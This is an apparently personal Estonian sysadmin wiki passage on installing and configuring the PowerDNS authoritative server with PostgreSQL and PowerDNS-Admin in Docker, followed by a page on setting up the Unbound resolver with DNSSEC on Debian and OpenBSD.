include "/var/lib/powerdns/supermaster.conf";
# Example for a manually configured slave zone:
#
zone "example.net" {
file "/var/lib/powerdns/zones.slave.d/example.net.zone";
type master;
masters { 192.0.2.53; };
};

Tsoon kirjeldatakse failis

# cat /var/lib/powerdns/zones.slave.d/example.net.zone
$TTL 180
@ IN SOA ns1.example.net. hostmaster.example.net. (
2014080705 ; Serial Number (date YYYYMMDD++)
86400 ; Refresh (24 hours)
1800 ; Retry (1/2 hour)
3600000 ; Expire (42 days)
21600) ; Minimum (6 hours)
IN NS ns1.example.net.
IN NS ns2.example.net.

@ IN A 192.168.0.15
IN MX 10 mail.example.net.
www IN A 192.168.0.15
mail IN A 192.168.0.2
ns1 IN A 10.1.1.171
ns2 IN A 10.1.1.172
imre IN A 10.1.1.173

Muudatuse kehtestamiseks

# pdns_control bind-reload-now example.net
example.net: parsed into memory at 2016-10-26 20:43:14 +0300

====PostgreSQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====BIND backend kasutamine====

pdns-backend-bind seadistatakse failist

# egrep -v "^$|^#" /etc/powerdns/pdns.d/bind.conf
launch+=bind
bind-config=/etc/powerdns/named.conf
bind-supermaster-config=/var/lib/powerdns/supermaster.conf
bind-supermaster-destdir=/var/lib/powerdns/zones.slave.d

kus

* /etc/powerdns/named.conf - tsoonide nimekiri
* /var/lib/powerdns/supermaster.conf - lihtsal juhul tühi
* /var/lib/powerdns/zones.slave.d - BIND formaadis tsoonifailide kataloog

Tsoonide haldamisega tegeleb edasi allpool olev punkt.

====Poweradmin====

Märkus: tõenäoliselt ei ole Poweradmin tarvkara kasutamine hea mõte kuna rakendus sodib otse PowerDNS andmebaasis ja 2016 aasta sügisel on hakanud tekkima paremaid alternatiive, nt nsedit.

Poweradmin kasutamiseks peab PowerDNS kasutama SQL andmebaasi ja Poweradmin peab töötama vastu sama andmebaasi. Tundub, et Poweradmin töötab paremini MySQL + PHP5 keskkonnas. Kui Poweradmin PHP rakendus töötab teises arvutis kui MySQL baas, sobib baasis öelda

mysql> grant all privileges on pdns.* to 'pdns'@'%' identified by 'dbconfig sisestatud parool';
mysql> grant all privileges on pdns.* to 'pdns'@'localhost' identified by 'dbconfig sisestatud parool';
mysql> flush privileges;

# pdns_control retrieve moraal.ee
Added retrieval request for 'moraal.ee.' from master 192.168.1.247

Kasulikud lisamaterjalid

* https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-powerdns-with-a-mariadb-backend-on-ubuntu-14-04

====Tsooni andmestikust otsing====

* Kõigi forward tsoonide sisust ip aadressi kasutamise leidmine

# for i in `pdns_control list-zones | grep -v All | grep -v in-addr`; do pdnsutil list-zone $i 2>&1 ; done | grep 10.20.123.154
ftp.moraal.ee 300 IN A 10.20.123.154

===2024 aasta kevade tähelepanekud===

Eesmärk

* ühe operatsioonisüteemi peal kompaktselt lahenduse pidamine - Debian v. 12
* dns server - PowerDNS
* webgui haldusliides - PowerDNS-Admin (PDA)
* dnssec võimekus
* docker abil kasutatakse konteinerit (PDA)
* andmeid hoitakse PostgreSQL andmebaasis

====Tööpõhimõte====

Väited

* dnssec kasutab algoritmi nr 13
* NSEC3 kasutab '1 0 0 -' seadistust
* sekundaarsete nimeserveritega suhtlemine toimub catalog-zones abil
* kasutatakse KSK/ZSK ja CSK lähenemist võtmete pidamisel

Protseduuride võimekus

* NSEC, NSEC3 ja NSEC3 param väärtuste muutmine
* võtme vahetus
* krüptimise algoritmi vahetus

====Platvormi ettevalmistamine====

Platvorm koosneb

* Debian v. 12 operatsioonisüsteem
* Docker Community Edition
* PostgreSQL v. 12
* NginX

PostgreSQL

<pre>
root@pdns:/tmp# apt-get install postgresql-common
root@pdns:/tmp# mkdir /etc/postgresql-common/createcluster.d
root@pdns:/tmp# echo "initdb_options = '--data-checksums'" > /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# echo "create_main_cluster = false" >> /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# apt-get install postgresql-16
root@pdns:/tmp# pg_createcluster --locale en_US.UTF-8 16 pgcluster_pdns_prod

postgres=# \x
Expanded display is on.
postgres=# \l postgres
List of databases
-[ RECORD 1 ]-----+------------
Name | postgres
Owner | postgres
Encoding | UTF8
Locale Provider | libc
Collate | en_US.UTF-8
Ctype | en_US.UTF-8
ICU Locale |
ICU Rules |
Access privileges |
</pre>

PowerDNS kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pdns login;
sql> \password pdns
sql> create database db_pdns owner = pdns;
</pre>

PowerDNS-Admin kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pda login;
sql> \password pda
sql> create database db_pda owner = pda;
</pre>

====PowerDNS paigaldamine====

PowerDNS ise ja tema tööks otseselt vajalikud komponendid (nt PostgreSQL andmebaas) töötavad nö tavalisel viisil operatsioonisüsteemi protsesside-teenustena st mitte-konteineritena.

<pre>
# apt-get install pdns-server pdns-backend-pgsql pdns-tools
</pre>

Tulemusena käivitatakse pdns server ja tema bind backend.

TODO

PostgreSQL backend kasutamine

<pre>
# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql
Password for user pdns:
CREATE TABLE
CREATE INDEX
CREATE INDEX
CREATE TABLE
CREATE INDEX
...
</pre>

Baasi ligipääs jms kirjeldatakse failis, https://doc.powerdns.com/authoritative/backends/generic-postgresql.html#

<pre>
root@pdns:~# egrep -v "^#|^$" /etc/powerdns/pdns.d/gpgsql.conf
launch+=gpgsql
gpgsql-dbname=db_pdns
gpgsql-dnssec=yes
gpgsql-host=127.0.0.1
gpgsql-password=parool
gpgsql-port=5432
gpgsql-user=pdns
</pre>

bind eemaldamiseks sobib kustutada fail

# rm /etc/powerdns/pdns.d/bind.conf

Tulemusena töötab pdns server, gpgsql backendiga

<pre>
2024-06-16T16:44:00.877817+03:00 pdns systemd[1]: Starting pdns.service - PowerDNS Authoritative Server...
2024-06-16T16:44:00.906026+03:00 pdns pdns_server[3916]: Loading '/usr/lib/x86_64-linux-gnu/pdns/libgpgsqlbackend.so'
2024-06-16T16:44:00.906356+03:00 pdns pdns_server[3916]: This is a standalone pdns
2024-06-16T16:44:00.906408+03:00 pdns pdns_server[3916]: Listening on controlsocket in '/run/pdns/pdns.controlsocket'
2024-06-16T16:44:00.906668+03:00 pdns pdns_server[3916]: UDP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906684+03:00 pdns pdns_server[3916]: UDP server bound to [::]:53
2024-06-16T16:44:00.906735+03:00 pdns pdns_server[3916]: TCP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906750+03:00 pdns pdns_server[3916]: TCP server bound to [::]:53
2024-06-16T16:44:00.906866+03:00 pdns pdns_server[3916]: PowerDNS Authoritative Server 4.9.1 (C) PowerDNS.COM BV
2024-06-16T16:44:00.906881+03:00 pdns pdns_server[3916]: Using 64-bits mode. Built using gcc 12.2.0 on May 28 2024 07:46:05 by root@localhost.
2024-06-16T16:44:00.906891+03:00 pdns pdns_server[3916]: PowerDNS comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it according to the terms of the GPL version 2.
2024-06-16T16:44:00.915255+03:00 pdns pdns_server[3916]: Polled security status of version 4.9.1 at startup, no known issues reported: OK
2024-06-16T16:44:00.926644+03:00 pdns pdns_server[3916]: Creating backend connection for TCP
2024-06-16T16:44:00.935773+03:00 pdns pdns_server[3916]: About to create 3 backend threads for UDP
2024-06-16T16:44:00.935850+03:00 pdns systemd[1]: Started pdns.service - PowerDNS Authoritative Server.
2024-06-16T16:44:01.086206+03:00 pdns pdns_server[3916]: Done launching threads, ready to distribute questions
</pre>

ühtegi tsooni ei ole kirjeldatud

<pre>
root@pdns:/tmp# pdnsutil list-all-zones
root@pdns:/tmp#
</pre>

====PowerDNS seadistamine====

Seadistamisel tegeldakse

* api sisselülitamine (PDA jaoks)
* SOA kirje vaikeväärtused
* DNSSEC vaike krüpto

====PowerDNS-Admin paigaldamine - PDA - docker====

PowerDNS-Admin tarvkara töötab docker konteinerina, aga kasutab host arvutist postgresql andmebaasi. Platvorm ettevalmistamine punktis on vajalik kasutaja ja create database tekitatud. PDA kasutamine eeldab, et PDNS juures on sisse lülitatud api liides (vaikimisi http liiklus üle port 8081).

Docker compose fail

<pre>
root@pdns:~# cat docker-compose-pda.yml
services:
svc_pda:
image: powerdnsadmin/pda-legacy:v0.4.2

container_name: cn_pda
restart: always
logging:
driver: json-file
options:
max-size: 50m
ports:
- "9191:80"
environment:
- SECRET_KEY='saladus'
- SQLALCHEMY_DATABASE_URI=postgresql://pda:pdaparool@192.168.10.53/pda
- GUNICORN_TIMEOUT=60
- GUNICORN_WORKERS=2
- GUNICORN_LOGLEVEL=DEBUG
- OFFLINE_MODE=False
- CSRF_COOKIE_SECURE=False

networks:
- nw_pda

networks:
nw_pda:
name: nw_pda
driver: bridge
</pre>

Käivitamiseks

# docker compose -f docker-compose-pda.yml up -d

Tulemusena on aadressil http://192.168.10.53:9191/ PDA webgui sisselogimise ekraan. Pressida Create Account ja esimesena tekitatud kasutaja on admin privileegidega.

TODO

====PowerDNS-Admin paigaldamine - NginX operatsioonisüsteem====

NginX https:// frontend kasutamiseks sobib kasutada sellist seadistust

<pre>
root@pdns:/etc/nginx/sites-enabled# cat /etc/nginx/sites-enabled/pdns
server {
listen 80;
server_name pdns.moraal.ee;
root /var/www/html;

if ($request_uri !~ /.well-known) {
return 301 https://pdns.moraal.ee/;
}
}

server {
listen 443 ssl http2;
server_name pdns.moraal.ee;
ssl_certificate /etc/ssl/localcerts/pdns.moraal.ee.pem;
ssl_certificate_key /etc/ssl/localcerts/pdns.moraal.ee.key;
ssl_session_timeout 1d;
ssl_session_cache shared:MozSSL:10m;
ssl_session_tickets off;
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers off;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-CHACHA20-POLY1305;

client_max_body_size 25m;

ssl_stapling off;
add_header Strict-Transport-Security "max-age=63072000" always;

access_log /var/log/nginx/access-pdns.moraal.ee-443.log;
root /var/www/html;

location / {
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-Forwarded-Proto https;
proxy_pass http://192.168.10.53:9191;
}
}
</pre>

====PowerDNS-Admin paigaldamine - NginX docker====

<pre>
# cat /srv/pdns/volume/nginx/etc/nginx/nginx.conf
# nginx.conf

user nginx;
worker_processes auto;
error_log /dev/stderr;
pid /var/run/nginx.pid;

events {
worker_connections 1024;
}

http {
include mime.types;
default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
access_log /dev/stdout main;

sendfile on;
keepalive_timeout 65;

# Redirect HTTP to HTTPS
server {
listen 80;
server_name _;
return 301 https://$host$request_uri;
}

# HTTPS Configuration
server {
listen 443 ssl;
server_name _;
http2 on;
ssl_protocols TLSv1.3;
ssl_prefer_server_ciphers on;

ssl_certificate /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.crt;
ssl_certificate_key /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.key;

# Recommended security settings
ssl_session_cache shared:SSL:10m;
ssl_session_timeout 10m;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305;

# Logging
access_log /dev/stdout;
error_log /dev/stdout;

# Reverse proxy to the destination
location / {
proxy_pass http://svc_pdns:8081;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}
}
</pre>

====Misc====

Tulemusena saab pda webgui poole pöörduda aadressiga https://pdns.moraal.ee/.

PDA kasutaja parooli muutmine postgresql baasis, nb rakendus kasutab tabeli nimena 'user', see on postgresql nö built-in objekt ja name clash ületamiseks tuleb pöörduda rakendusega seotud ressursi poole "user" abil, eriti koos skeemi prefiksiga

<pre>
# su - postgres
$ psql db_pda
pda=# select * from public."user";
-[ RECORD 1 ]------------------------------------------------------------
id | 1
username | admin
password | $2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FF
firstname | Imre
lastname | Oolberg
email | imre.oolberg@auul.pri.ee
otp_secret |
role_id | 1
confirmed | f
..

db_pda=# update public."user" set password='$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC' where username='admin';
UPDATE 1
</pre>

kusjuures password väärtus tekitatakse nt

<pre>
$ htpasswd -bnBC 15 "" pdaparool | tr -d ':\n'
$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC
</pre>

Kasutaja lisamine

<pre>
db_pda=# insert into "user" (username, password, firstname, lastname, email, role_id, confirmed) values ('admin', '$2b$12$4M9qXQaWn95GTregvSO2v.I/1QQT0/Ayqt3jZsMp06FIa5dMme6Gu', 'Administrator', 'Administrator', 'priit@moraal.ee', 1, 'f');
</pre>

pdns api kontakti lisamine

<pre>
db_pda=# insert into setting (name, value) values ('pdns_api_url', 'http://192.168.10.80:8081');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_api_key', 'apiparool');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_version', '4.9.11');
INSERT 0 1
db_pda=# select * from setting;
id | name | value
----+--------------+------------------------
7 | pdns_api_url | http://192.168.10.80:8081
8 | pdns_api_key | apiparool
9 | pdns_version | 4.9.11
(3 rows)
</pre>

====PDA kasutamise privileegid====

Väited

* Account - grupi taoline moodustis, praktiliselt võiks vastata domeeni omanik asutusele
* User - kasutaja taoline moodustis, vastab inimesele kes süsteemi kasutab
* User ja Account vaheliste seoste abil saab anda hulgale kasutajatele õiguse tegeleda hulga domeenidega

<pre>
root@rv-xxx-01:/opt/pda/dc# docker exec -ti e8 sh
/app $ ps aux
PID USER TIME COMMAND
1 pda 0:00 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
7 pda 0:02 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
8 pda 0:01 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG

[2025-10-31 13:06:25,927] [record.py:61] ERROR - Cannot fetch zone's record data from remote powerdns api. DETAIL: HTTPSConnectionPool(host='rvxxx-01.test.moraal.ee', port=443): Max retries exceeded with url: /api/v1/servers/localhost/zones/imretest-03.ee (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self-signed certificate in certificate chain (_ssl.c:1007)')))

volumes:
# - /opt/pda/volume/pda/etc/ssl/certs/ca-certificates.crt:/usr/lib/python3.10/site-packages/certifi/cacert.pem
</pre>

====PDA API liidese kasutamine====

Tsooni tekitamine

<pre>
$ curl -s -L -H 'Content-Type: application/json' -H 'Authorization: Basic xxx' -X POST https://pda.moraal.ee/api/v1/pdnsadmin/zones \
--data '{"name": "zone-moraal-imre-test-01.ee.", "kind": "MASTER", "nameservers": ["ans1.moraal.ee.", "ans2.moraal.ee."]}' | jq .
{
"account": "",
"api_rectify": false,
"catalog": "",
"dnssec": false,
"edited_serial": 2026010802,
"id": "zone-moraal-imre-test-01.ee.",
"kind": "Master",
"last_check": 0,
"master_tsig_key_ids": [],
"masters": [],
"name": "zone-moraal-imre-test-01.ee.",
"notified_serial": 0,
"nsec3narrow": false,
"nsec3param": "",
"rrsets": [
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee. hostmaster.moraal.ee. 2026010801 86400 7200 2419200 10800",
"disabled": false
}
],
"ttl": 3600,
"type": "SOA"
},
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee.",
"disabled": false
},
{
"content": "ans2.moraal.ee.",
"disabled": false
}
],
"ttl": 3600,
"type": "NS"
}
],
"serial": 2026010801,
"slave_tsig_key_ids": [],
"soa_edit": "",
"soa_edit_api": "DEFAULT",
"url": "/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee."
}
</pre>

Kui pole ligipääsu saab sellise vastuse

<pre>
% curl -s -L -H 'Content-Type: application/json' -H 'X-API-KEY: xxx' -X GET "https://pda.moraal.ee/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee" | jq .
{
"msg": "Zone access not allowed"
}
</pre>

===pdns docker lahendus===

<pre>
# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.1,192.168.10.0/24
allow-notify-from=
allow-unsigned-notify=yes
also-notify=
api=yes
api-key=saladus
default-api-rectify=yes
default-ksk-algorithm=ecdsa256
default-soa-content=ans1.auu.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600
disable-syslog=no
forward-notify=
include-dir=/etc/powerdns/pdns.d
launch=
local-address=172.30.0.15, 10.30.0.15
local-port=53
log-dns-details=yes
log-dns-queries=yes
log-timestamp=yes
loglevel=4
only-notify=
primary=yes
secondary=yes
webserver=yes
webserver-address=10.30.0.15
webserver-allow-from=0.0.0.0/0
webserver-loglevel=detailed
webserver-password=saladus
webserver-port=8081
</pre>

===pdns podman lahendus===

PDNS Quadlet Service kirjeldus

<pre>
kasutaja@ns-pdns-01:~$ cat .config/containers/systemd/pdns-01.container
[Unit]
Description=My PDNS Quadlet Service
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/powerdns/pdns-auth-49:latest
PublishPort=1053:8053/tcp
PublishPort=1053:8053/udp
ContainerName=pdns-01
Volume=%h/volume/pdns/etc/powerdns/pdns.conf:/etc/powerdns/pdns.conf:ro
Environment=PDNS_local_port=8053

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

ning pdns.conf seadistusfail

<pre>
# cat /opt/pdns/volume/pdns/etc/powerdns/pdns.conf
local-address=0.0.0.0
launch=
# include-dir=/etc/powerdns/pdns.d
api=yes
api-key=parool
webserver=yes
webserver-address=0.0.0.0
webserver-allow-from=0.0.0.0/0

#master=yes

primary=yes
secondary=yes
allow-axfr-ips= 100.20.21.0/24,127.0.0.1/32,172.17.0.0/16
also-notify=192.168.1.150
only-notify=
forward-notify=
default-soa-content=ans1.auul.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600

default-ksk-algorithm=ecdsa256
default-api-rectify=yes
# default-nsec3-param=1 0 0 -

launch+=gpgsql
gpgsql-dnssec=yes
gpgsql-extra-connection-parameters=password=parool dbname=db_pdns port=5432 user=pdns host=192.168.1.147
</pre>

===Tsooni migreerimine pädeva pdns peale===

====Protseduur====

TODO

====Käsundamine====

Tekitatakse migreeritava tsooni sekundaar

<pre>
# pdnsutil create-secondary-zone moraal.ee 192.168.1.148
</pre>

===Kasulikud lisamaterjalid===

* https://www.powerdns.com/
* http://www.poweradmin.org/
* https://github.com/PowerDNS/pdns/wiki/WebFrontends
* http://jpmens.net/2010/10/29/alternative-dns-servers-the-book-as-pdf/
* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/
* https://www.cloudflare.com/dns/dnssec/how-dnssec-works/

Rekursiivse resolveri Unbound kasutamine operatsioonisüsteemiga Debian

2026-06-16T08:35:24Z

Imre: /* Kasulikud lisamaterjalid */

[[Kategooria:Interneti domeeninimede süsteem]]
===Sissejuhatus===

Üks võimalus liigitada nimeservereid või nimeserverite tarkvara on selle järgi, millised päringuid teenindatakse

* pädev ehk autoriteetne (ingl. k. authoritative) - vastab päringutele ainult nimeserveri tsoonifailis kirjeldatud andmete alusel; autoriteetsed nimeserverid teenindavad reeglina resolverite päringuid
* rekursiivne (ingl. k. recursive) - rekursiivne nimeserver ei sisalda nö oma tsoonifaili, st ta ei ole mingite vastuste osas autoriteetne; rekursiivne nimeserver teenindab mingi piiratud hulga klientide päringuid lahendades neid autoriteetsete nimeserverite abil ja seetõttu nimetatakse rekursiivset nimeserverit tihti resolveriks (ingl. k. to resolve - lahendama)

Unbound http://www.unbound.net/ resolveril on selliseid omadused

* rekursiivne - lahendab nö lõppkasutaja esitatud päringuid, nt sobib seadistada töökohaarvuti nimeserveriks
* vaheladustav (ingl. k. caching) - Unbound peab kord lahendatud vastust mõnda aega meeles, mis tähendab, et järgmisele samale päringule vastab ta kliendile kohe ja ei pea omakorda pöörduma vastuse saamiseks autoriteetsete nimeserverite poole
* valideeriv - toetab DNSSEC kasutamist
* IPv6 tugi

Rekursiivse resolveri vastutus on parimal võimalikul moel anda kliendi esitatud päringule vastus, seejuures

* kasutada vastuse koostamisel mitmete pädevate nimeserverite abi
* anda õige vastus - nt mitte ennast lasta eksitada cache poisoning tehnikatest, võimalusel kasutada DNSSEC vahendeid
* vastata kiiresti

===Unbound paigaldamine===

2011 aastal leidub paljude operatsioonisüsteemide paketihalduses Unbound tarkvara.

====Debian====

Debian Squeeze sisaldab versiooni 1.4.6 ja paigaldamiseks sobib öelda

# apt-get install unbound

====OpenBSD====

OpenBSD 5.4 sisaldab binaarse paketina versiooni 1.4.9 ja paigaldamiseks sobib öelda

# pkg_add unbound
unbound-1.4.20:libldns-1.6.16p0: ok
useradd: Warning: home directory `/var/unbound' doesn't exist, and -m was not specified
unbound-1.4.20: ok
The following new rcscripts were installed: /etc/rc.d/unbound
See rc.d(8) for details.
--- +unbound-1.4.20 -------------------
You should add:

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

to /etc/rc.conf.local to create a syslog socket in the unbound chroot.

Selleks, et /etc/rc.d/unbound skript töötaks, peab olema seadistatud unbound-control (127.0.0.1 pealt).

===Unbound seadistamine===

Resolveri seadistusfailis tuleb näidata muu hulgas

* juurnimeserverite aadressid
* millisel aadressil resolver päringuid teenindab
* millised kliendid saavad resolverit kasutada, tavaliselt kliendi src ip aadressi täpsusega

Unbound tööd juhib seadistusfail unbound.conf

* /etc/unbound/unbound.conf - Debian
* /var/unbound/etc/unbound.conf - OpenBSD

Lihtsamal juhul võib kasutada nt sellise sisuga seadistusfaili

server:
interface: 192.168.10.190
outgoing-interface: 192.168.10.190
access-control: 192.168.1.0/24 allow
access-control: 192.168.10.0/24 allow_snoop
root-hints: "/var/unbound/etc/named.cache"

kus

* interface - millisel aadressil arvuti Unbound resolveri kliente teenindab
* outgoing-interface - milliselt aadressilt resolveri päringud autoriteetsetele nimeserveritele väljuvad
* access-control - millistelt ip aadressidelt saab Unbound resolverit kasutada; allow lubab esitada ainult rekursiivseid päringuid, nt +norec annab vaikimisi refused vastuse

$ dig +norec @nimeserver domeeni.nimi
...
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 52133

allow_snoop lubab mõlemaid (viimane on vajalik, et unbound kasutaja saaks öelda

$ dig +trace @nimeserver domeeni.nimi

* root-hints - resolver peab alati teadma interneti juurnimeserverite aadresse

Juurnimeserverite aadresse saab küsida mõnes juba seadistatud resolveriga arvutis

$ dig . ns

või kopeerida aadressilt Linuxis

$ wget ftp://FTP.INTERNIC.NET/domain/named.cache

OpenBSD keskkonnas

$ ftp ftp://FTP.INTERNIC.NET/domain/named.cache

===Unbound käivitamine===

Unbound resolver teenindab päringuid portidel 53/udp ja 53/tcp.

====Debian====

Käivitamiseks tuleb öelda

# /etc/init.d/unbound start | stop

====OpenBSD====

Selleks, et Unbound töötaks OpenBSD all chroot keskkonnas kataloogis /var/unbound kasutajana _unbound tuleb kasutada seadistusfailis rida

chroot: "/var/unbound"

Et chroot keskkonnas töötav Unbound saaks logida syslog'i tuleb syslog käivitamisel lisaks kasutada '-a /var/unbound/dev/log'

# syslogd -a /var/www/dev/log -a /var/empty/dev/log -a /var/unbound/dev/log

/etc/rc.conf.local failis sobib kasutada rida

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

2012 kevadel ütleb OpenBSD v. 5.1 paketihalduse unbound chroot kasutamisel kävitamisel nii

# unbound -dv
[1335943357] unbound[20534:0] notice: Start of unbound 1.4.15.
[1335943357] unbound[20534:0] warning: increased limit(open files) from 128 to 4140
[1335943357] unbound[20534:0] warning: unable to setusercontext _unbound: Bad file descriptor

Limiitide tuleb töötada sarnaselt nagu on kirjeldatud aadressil http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_OpenBSD_kasutamine#Login_class_kasutamine.

Tavalisel viisil sobib kasutada käivitusskripti

# /etc/rc.d/unbound start | stop

Vastasel korral on logis midagi sellist

Mar 13 16:03:01 unbound[28759:0] error: can't create socket: Too many open files

===Unbound kasutamine===

Unbound resolveri kasutajateks on tavaliselt arvutid, mis vajavad nimelahendust, nt kohtvõrgu arvutid, eposti serverid jt kusjuures Unbound protsess töötab selleks ettenähtud arvutis või võrgusõlmeks olevas seadmes

internet
...
|
_|_
| | OpenBSD võrgusõlm
|___| Unbound protsess
|
--|---|----------|-----------|--
| | |

dns kliendid (töökohaarvuti, serverid)

Linux keskkonnas sobib näidata nimeserveri aadress staatiliselt arvuti /etc/resolv.conf failis nt reaga

nameserver 192.168.10.190

Unbound resolveri tööd saab kontrollida nt öeldes mõnes arvutis, kus peab kõnealust resolverit saama kasutada

$ dig @192.168.10.190 kuutorvaja.eenet.ee a

ja vastus peaks sisaldama sarnaseid ridu rida

...
;; QUESTION SECTION:
;kuutorvaja.eenet.ee. IN A

;; ANSWER SECTION:
kuutorvaja.eenet.ee. 83840 IN A 193.40.0.7
..

===Nimepäringu vastuse valideerimine===

Nimepäringute vastuste valideerimiseks kasutatakse üldiselt DNSSEC tehnikat. 2011 aastal on selleks mitmeid võimalusi, kaks populaarsemat on

* signeeritud tsoonifailidega juurnimeserverite kasutamine, kõige loomulikum viis
* DLV (DNSSEC Look-aside Validation) - üleminekuaja häkk

Kui nimeteenust kasutatakse sarnaselt ülaltoodud skeemile, siis peab arvestama, et DNSSEC kontroll toimub Unbound protsessi juures, sealt edasi kliendini liigub vastus tavalise avateksina üle kohtvõrgu ja klient otsustab vastuse turvalisuse üle ad biti järgi vastuses. Seetõttu on reeglina soovitav, et Unbound töötaks nimeteenust kasutatavatele arvutitele võimalikult lähedal.

DNSSEC juurutamise kronoloogia

* 15. juuli 2010 - juurnimeserverid kasutavad signeeritud tsoone http://www.root-dnssec.org/
* ? - .org tsoon on signeeritud
* 31. märts 2011 - .com tsoon on signeeritud http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/

Kasulikud lisamaterjalid

* http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/
* http://blogs.pcmag.com/securitywatch/2011/03/dnssec_in_com_domain_is_a_good.php

====Signeeritud tsoonifailiga juurnimeserverite kasutamine====

Unbound seadistamiseks tuleb kasutada seadistusfailis rida

auto-trust-anchor-file: "root.key"

kusjuures fail peab olema unbound protsessile kirjutatav ning esialgselt sisaldama rida (as per http://unbound.net/documentation/howto_anchor.html)

# cat /var/unbound/etc/root.key
. IN DS 19036 8 2 49AAC11D7B6F6446702E54A1607371607A1A41855200FD2CE1CDDE32F24E8FB5

# chown _unbound /var/unbound/etc
# chown _unbound:_unbound /var/unbound/etc/root.key

Peale unbound protsessi käivitamist selle faili sisu muutub automaatselt.

Kontrollimiseks sobib öelda

$ dig . ns +dnssec +multiline

; <<>> DiG 9.7.2-P3 <<>> . ns +dnssec +multiline
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4737
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 14, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 518267 IN NS m.root-servers.net.
. 518267 IN NS g.root-servers.net.
. 518267 IN NS b.root-servers.net.
. 518267 IN NS h.root-servers.net.
. 518267 IN NS a.root-servers.net.
. 518267 IN NS e.root-servers.net.
. 518267 IN NS k.root-servers.net.
. 518267 IN NS f.root-servers.net.
. 518267 IN NS c.root-servers.net.
. 518267 IN NS j.root-servers.net.
. 518267 IN NS i.root-servers.net.
. 518267 IN NS l.root-servers.net.
. 518267 IN NS d.root-servers.net.
. 518267 IN RRSIG NS 8 0 518400 20110409000000 (
20110401230000 34525 .
De4SFgTDwpgbz1JjTlaPzu7ZNRURLSnoYmQQQIZq7Gny
RghOrsvS1soH5F43Gxr5BIi+422EBLJIrEHFnbvLy22S
LqKtSw67eDdsBZyjE5fTtDHyYhnoR8YQWswgGVMRk4Ek
iDDMIOk5pF+CvbML6TlvTWrnPCwNWXnbLFnT9SY= )

;; Query time: 0 msec
